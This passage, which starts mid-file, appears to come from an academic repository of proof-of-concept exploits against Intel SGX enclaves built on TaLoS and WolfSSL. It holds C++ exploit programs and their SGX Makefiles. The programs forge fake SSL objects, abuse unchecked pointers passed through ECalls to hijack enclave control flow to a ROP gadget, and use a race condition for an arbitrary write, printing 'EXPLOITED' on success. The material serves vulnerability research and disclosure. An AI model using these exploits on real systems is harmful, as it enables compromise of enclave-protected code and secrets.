0); 70 | 71 | pthread_t threadid; 72 | // 2. Create a second thread that will assure that the ECall writes the desires value. 73 | pthread_create(&threadid, NULL, thread, NULL); 74 | 75 | // 3. This ECall will copy the value from the specified address to the Zero Page AND BACK. Due to the race condition this value can be chosen freely. 76 | uint64_t ms[] = { 0, (uint64_t)base + 0x57eac08 - 0x18 }; 77 | // public BIO *ecall_SSL_get_rbio([user_check] const SSL *s); 78 | call_ecall(56, ms); 79 | } 80 | -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-write/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | 90 | -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-write/enclave.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/TaLoS-exploit-race-arbitrary-write/enclave.signed.so -------------------------------------------------------------------------------- /TaLoS-exploit/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | 6 | #include "sgx_edger8r.h" // sgx_ecall 7 | #include "sgx_urts.h" // sgx_create_enclave 8 | 9 | /* Global EID shared by multiple threads */ 10 | sgx_enclave_id_t global_eid = 0; 11 | 12 | int initialize_enclave(const char* enclave_filename) 13 | { 14 | if (global_eid != 0) 15 | return 0; 16 | 17 | sgx_launch_token_t token = {0}; 18 | int updated; 19 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 20 | if (ret != SGX_SUCCESS) 21 | return -1; 22 | 23 | return 0; 24 | } 25 | 26 | void* enclave_base() { 27 | FILE* fp = fopen("/proc/self/smaps", "r"); 28 | if (fp == 0) return 0; 29 | char* line = 0; size_t len = 0; ssize_t read; 30 | 31 | // first isgx page (CODE, r_x) 32 | while((read = getline(&line, &len, fp)) != -1) 33 | if (strstr(line, "isgx")) 34 | return (void*)strtoll(line, NULL, 16); 35 | } 36 | 37 | int call_ecall(int ecall_idx, void* ms) 38 | { 39 | sgx_ecall(global_eid, ecall_idx, 0, ms); 40 | } 41 | 42 | int main(int argc, char** argv) 43 | { 44 | if (initialize_enclave("enclave.signed.so") < 0) 45 | return -1; 46 | 47 | uint64_t* base = (uint64_t*) enclave_base(); 48 | 49 | // 1. Create a fake SSL_CTX 50 | uint64_t buffer[1000] = { 0 }; 51 | buffer[0] = (uint64_t) buffer; 52 | buffer[0x88/8] = 0xDEADC0DE; 53 | buffer[0x88/8] = (uint64_t) base + 0x363f5; 54 | 55 | // 2. The ECall will call the function specified in the fake objecct. 56 | uint64_t ms[] = { 0, (uint64_t) buffer, 0, (uint64_t) buffer, sizeof(buffer), 1 }; 57 | // public long ecall_SSL_CTX_ctrl([user_check] SSL_CTX *ctx, int cmd, long larg, [user_check] void *parg); 58 | call_ecall(11, ms); 59 | 60 | if ((int) ms[0] == 2) 61 | printf("EXPLOITED\n"); 62 | } 63 | -------------------------------------------------------------------------------- /TaLoS-exploit/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | 90 | -------------------------------------------------------------------------------- /TaLoS-exploit/enclave.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/TaLoS-exploit/enclave.signed.so -------------------------------------------------------------------------------- /WolfSSL-exploit/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "sgx_edger8r.h" // sgx_ecall 6 | #include "sgx_urts.h" // sgx_create_enclave 7 | 8 | /* Global EID shared by multiple threads */ 9 | sgx_enclave_id_t global_eid = 0; 10 | 11 | int initialize_enclave(const char *enclave_filename) { 12 | if (global_eid != 0) 13 | return 0; 14 | 15 | sgx_launch_token_t token = {0}; 16 | int updated; 17 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, 18 | &token, &updated, &global_eid, NULL); 19 | if (ret != SGX_SUCCESS) 20 | return -1; 21 | 22 | return 0; 23 | } 24 | 25 | int call_ecall(int ecall_idx, void *ms) { 26 | sgx_ecall(global_eid, ecall_idx, 0, ms); 27 | } 28 | 29 | int main(int argc, char **argv) { 30 | if (initialize_enclave("enclave.signed.so") < 0) 31 | return -1; 32 | 33 | // ECALL: 34 | // public WOLFSSL_METHOD* enc_wolfTLSv1_2_client_method(void); 35 | uint64_t ms1[1] = {0}; 36 | call_ecall(5, ms1); // client method 37 | 38 | // ECALL: 39 | // public WOLFSSL_CTX* enc_wolfSSL_CTX_new([user_check] WOLFSSL_METHOD* 40 | // method); 41 | uint64_t ms2[2] = {0, ms1[0]}; 42 | call_ecall(7, ms2); // CTX_new(method) 43 | uint64_t ctx = ms2[0]; 44 | 45 | // Here we abuse the function use_PrivateKey_buffer to move an arbitrary 46 | // buffer into enclave memory. However, also other functions, such as the 47 | // `write` function would be suitable to achieve this. 48 | // 49 | // The buffer in the enclave memory then contains a fake WOLFSSL struct, which 50 | // we abuse later. 51 | 52 | // Buffer, which contains the fake WOLFSSL struct 53 | uint64_t buffer[1000] = {0}; 54 | // necessary values, part of fake WOLFSSL struct 55 | buffer[0x3a0 / sizeof(uint64_t)] = 0x20; 56 | buffer[0x120 / sizeof(uint64_t)] = 0x1; 57 | // JUMP TARGET: return 2 58 | // This is the address of a "ROP Gadget" in sgx_enc_wolfSSL_CTX_new 59 | // ``` 60 | // mov rax, 2 61 | // ret 62 | // ``` 63 | // This is just to demonstrate the control-flow hijack and will immediately 64 | // return with a return value that is passed through to the untrusted world. 65 | // 66 | buffer[0x58 / sizeof(uint64_t)] = ctx & 0xffffffffff000000 | 0x1927; 67 | 68 | // ECALL: 69 | // public int enc_wolfSSL_CTX_use_PrivateKey_buffer( 70 | // [user_check] WOLFSSL_CTX* ctx, 71 | // [in, size=sz] const unsigned char* buf, 72 | // long sz, 73 | // int type); 74 | uint64_t ms3[5] = {0, ctx, (uint64_t)buffer, sizeof(buffer), 1}; 75 | call_ecall(8, ms3); // use_priv_key_buffer(ctx, buf, size, type) 76 | 77 | // we pass a single parameter, which is the pointer to the fake WOLFSSL 78 | // object. 79 | // 80 | // ECALL: 81 | // public int enc_wolfSSL_connect([user_check]WOLFSSL* ssl); 82 | uint64_t ms4[2] = {0, 83 | (uint64_t)(ctx + 0x228)}; // _in_buf of use_priv_key_buffer 84 | // ms4[1] = ms2[0]; 85 | call_ecall(15, ms4); // connect(ctx) 86 | 87 | switch ((int)ms4[0]) { 88 | case 2: 89 | printf("EXPLOITED\n"); 90 | break; 91 | default: 92 | case -1: 93 | printf("ERROR\n"); 94 | } 95 | } 96 | -------------------------------------------------------------------------------- /WolfSSL-exploit/Makefile: -------------------------------------------------------------------------------- 1 | # BEFORE MAKE: 2 | # source ~/linux-sgx/linux/installer/bin/sgxsdk/environment 3 | 4 | ######## SGX SDK Settings ######## 5 | 6 | SGX_SDK ?= /opt/intel/sgxsdk 7 | SGX_MODE ?= HW 8 | SGX_ARCH ?= x64 9 | SGX_DEBUG ?= 1 10 | 11 | ifeq ($(shell getconf LONG_BIT), 32) 12 | SGX_ARCH := x86 13 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 14 | SGX_ARCH := x86 15 | endif 16 | 17 | ifeq ($(SGX_ARCH), x86) 18 | SGX_COMMON_CFLAGS := -m32 19 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 20 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 21 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 22 | else 23 | SGX_COMMON_CFLAGS := -m64 24 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 25 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 26 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 27 | endif 28 | 29 | ifeq ($(SGX_DEBUG), 1) 30 | ifeq ($(SGX_PRERELEASE), 1) 31 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 32 | endif 33 | endif 34 | 35 | ifeq ($(SGX_DEBUG), 1) 36 | SGX_COMMON_CFLAGS += -O0 -g 37 | else 38 | SGX_COMMON_CFLAGS += -O2 39 | endif 40 | 41 | ######## App Settings ######## 42 | 43 | ifneq ($(SGX_MODE), HW) 44 | Urts_Library_Name := sgx_urts_sim 45 | else 46 | Urts_Library_Name := sgx_urts 47 | endif 48 | 49 | App_Cpp_Files := App/App.cpp 50 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 51 | 52 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 53 | 54 | # Three configuration modes - Debug, prerelease, release 55 | # Debug - Macro DEBUG enabled. 56 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 57 | # Release - Macro NDEBUG enabled. 58 | ifeq ($(SGX_DEBUG), 1) 59 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 60 | else ifeq ($(SGX_PRERELEASE), 1) 61 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 62 | else 63 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 64 | endif 65 | 66 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 67 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 68 | 69 | ifneq ($(SGX_MODE), HW) 70 | App_Link_Flags += -lsgx_uae_service_sim 71 | else 72 | App_Link_Flags += -lsgx_uae_service 73 | endif 74 | 75 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 76 | 77 | App_Name := app 78 | 79 | ######## Enclave Settings ######## 80 | 81 | Enclave_Version_Script := Enclave/Enclave_debug.lds 82 | ifeq ($(SGX_MODE), HW) 83 | ifneq ($(SGX_DEBUG), 1) 84 | ifneq ($(SGX_PRERELEASE), 1) 85 | # Choose to use 'Enclave.lds' for HW release mode 86 | Enclave_Version_Script = Enclave/Enclave.lds 87 | endif 88 | endif 89 | endif 90 | 91 | ifneq ($(SGX_MODE), HW) 92 | Trts_Library_Name := sgx_trts_sim 93 | Service_Library_Name := sgx_tservice_sim 94 | else 95 | Trts_Library_Name := sgx_trts 96 | Service_Library_Name := sgx_tservice 97 | endif 98 | Crypto_Library_Name := sgx_tcrypto 99 | 100 | Enclave_Cpp_Files := Enclave/Enclave.cpp $(wildcard Enclave/TrustedLibrary/*.cpp) 101 | Enclave_Include_Paths := -IInclude -IEnclave -I$(SGX_SDK)/include -I$(SGX_SDK)/include/libcxx -I$(SGX_SDK)/include/tlibc 102 | 103 | Enclave_C_Flags := $(SGX_COMMON_CFLAGS) -nostdinc -fvisibility=hidden -fpie -fstack-protector $(Enclave_Include_Paths) 104 | Enclave_Cpp_Flags := $(Enclave_C_Flags) -nostdinc++ -std=c++11 105 | 106 | # To generate a proper enclave, it is recommended to follow below guideline to link the trusted libraries: 107 | # 1. Link sgx_trts with the `--whole-archive' and `--no-whole-archive' options, 108 | # so that the whole content of trts is included in the enclave. 109 | # 2. For other libraries, you just need to pull the required symbols. 110 | # Use `--start-group' and `--end-group' to link these libraries. 111 | # Do NOT move the libraries linked with `--start-group' and `--end-group' within `--whole-archive' and `--no-whole-archive' options. 112 | # Otherwise, you may get some undesirable errors. 113 | Enclave_Link_Flags := $(SGX_COMMON_CFLAGS) -Wl,--no-undefined -nostdlib -nodefaultlibs -nostartfiles -L$(SGX_LIBRARY_PATH) \ 114 | -Wl,--whole-archive -l$(Trts_Library_Name) -Wl,--no-whole-archive \ 115 | -Wl,--start-group -lsgx_tstdc -lsgx_tcxx -l$(Crypto_Library_Name) -l$(Service_Library_Name) -Wl,--end-group \ 116 | -Wl,-Bstatic -Wl,-Bsymbolic -Wl,--no-undefined \ 117 | -Wl,-pie,-eenclave_entry -Wl,--export-dynamic \ 118 | -Wl,--defsym,__ImageBase=0 \ 119 | -Wl,--version-script=$(Enclave_Version_Script) 120 | 121 | Enclave_Cpp_Objects := $(Enclave_Cpp_Files:.cpp=.o) 122 | 123 | Enclave_Name := enclave.so 124 | Signed_Enclave_Name := enclave.signed.so 125 | Enclave_Config_File := Enclave/Enclave.config.xml 126 | 127 | ifeq ($(SGX_MODE), HW) 128 | ifeq ($(SGX_DEBUG), 1) 129 | Build_Mode = HW_DEBUG 130 | else ifeq ($(SGX_PRERELEASE), 1) 131 | Build_Mode = HW_PRERELEASE 132 | else 133 | Build_Mode = HW_RELEASE 134 | endif 135 | else 136 | ifeq ($(SGX_DEBUG), 1) 137 | Build_Mode = SIM_DEBUG 138 | else ifeq ($(SGX_PRERELEASE), 1) 139 | Build_Mode = SIM_PRERELEASE 140 | else 141 | Build_Mode = SIM_RELEASE 142 | endif 143 | endif 144 | 145 | 146 | .PHONY: all run 147 | 148 | ifeq ($(Build_Mode), HW_RELEASE) 149 | all: .config_$(Build_Mode)_$(SGX_ARCH) $(App_Name) $(Enclave_Name) 150 | @echo "The project has been built in release hardware mode." 151 | @echo "Please sign the $(Enclave_Name) first with your signing key before you run the $(App_Name) to launch and access the enclave." 152 | @echo "To sign the enclave use the command:" 153 | @echo " $(SGX_ENCLAVE_SIGNER) sign -key -enclave $(Enclave_Name) -out <$(Signed_Enclave_Name)> -config $(Enclave_Config_File)" 154 | @echo "You can also sign the enclave using an external signing tool." 155 | @echo "To build the project in simulation mode set SGX_MODE=SIM. To build the project in prerelease mode set SGX_PRERELEASE=1 and SGX_MODE=HW." 156 | else 157 | all: .config_$(Build_Mode)_$(SGX_ARCH) $(App_Name) # $(Signed_Enclave_Name) 158 | ifeq ($(Build_Mode), HW_DEBUG) 159 | @echo "The project has been built in debug hardware mode." 160 | else ifeq ($(Build_Mode), SIM_DEBUG) 161 | @echo "The project has been built in debug simulation mode." 162 | else ifeq ($(Build_Mode), HW_PRERELEASE) 163 | @echo "The project has been built in pre-release hardware mode." 164 | else ifeq ($(Build_Mode), SIM_PRERELEASE) 165 | @echo "The project has been built in pre-release simulation mode." 166 | else 167 | @echo "The project has been built in release simulation mode." 168 | endif 169 | endif 170 | 171 | run: all 172 | ifneq ($(Build_Mode), HW_RELEASE) 173 | @$(CURDIR)/$(App_Name) 174 | @echo "RUN => $(App_Name) [$(SGX_MODE)|$(SGX_ARCH), OK]" 175 | endif 176 | 177 | ######## App Objects ######## 178 | 179 | App/Enclave_u.c: $(SGX_EDGER8R) Enclave/Enclave.edl 180 | @cd App && $(SGX_EDGER8R) --untrusted ../Enclave/Enclave.edl --search-path ../Enclave --search-path $(SGX_SDK)/include 181 | @echo "GEN => $@" 182 | 183 | App/Enclave_u.o: App/Enclave_u.c 184 | @$(CC) $(App_C_Flags) -c $< -o $@ 185 | @echo "CC <= $<" 186 | 187 | App/%.o: App/%.cpp 188 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 189 | @echo "CXX <= $<" 190 | 191 | $(App_Name): $(App_Cpp_Objects) 192 | @$(CXX) $^ -o $@ $(App_Link_Flags) 193 | @echo "LINK => $@" 194 | 195 | .config_$(Build_Mode)_$(SGX_ARCH): 196 | @rm -f .config_* $(App_Name) $(Enclave_Name) $(Signed_Enclave_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 197 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 198 | 199 | ######## Enclave Objects ######## 200 | 201 | Enclave/Enclave_t.c: $(SGX_EDGER8R) Enclave/Enclave.edl 202 | @cd Enclave && $(SGX_EDGER8R) --trusted ../Enclave/Enclave.edl --search-path ../Enclave --search-path $(SGX_SDK)/include 203 | @echo "GEN => $@" 204 | 205 | Enclave/Enclave_t.o: Enclave/Enclave_t.c 206 | @$(CC) $(Enclave_C_Flags) -c $< -o $@ 207 | @echo "CC <= $<" 208 | 209 | Enclave/%.o: Enclave/%.cpp 210 | @$(CXX) $(Enclave_Cpp_Flags) -c $< -o $@ 211 | @echo "CXX <= $<" 212 | 213 | $(Enclave_Name): Enclave/Enclave_t.o $(Enclave_Cpp_Objects) 214 | @$(CXX) $^ -o $@ $(Enclave_Link_Flags) 215 | @echo "LINK => $@" 216 | 217 | $(Signed_Enclave_Name): $(Enclave_Name) 218 | @$(SGX_ENCLAVE_SIGNER) sign -key Enclave/Enclave_private.pem -enclave $(Enclave_Name) -out $@ -config $(Enclave_Config_File) 219 | @echo "SIGN => $@" 220 | 221 | .PHONY: clean 222 | 223 | clean: 224 | @rm -f .config_* $(App_Name) $(Enclave_Name) $(Signed_Enclave_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 225 | -------------------------------------------------------------------------------- /WolfSSL-exploit/Wolfssl_Enclave.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/WolfSSL-exploit/Wolfssl_Enclave.signed.so -------------------------------------------------------------------------------- /WolfSSL-exploit/app: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/WolfSSL-exploit/app -------------------------------------------------------------------------------- /WolfSSL-exploit/enclave.signed.so: -------------------------------------------------------------------------------- 1 | Wolfssl_Enclave.signed.so --------------------------------------------------------------------------------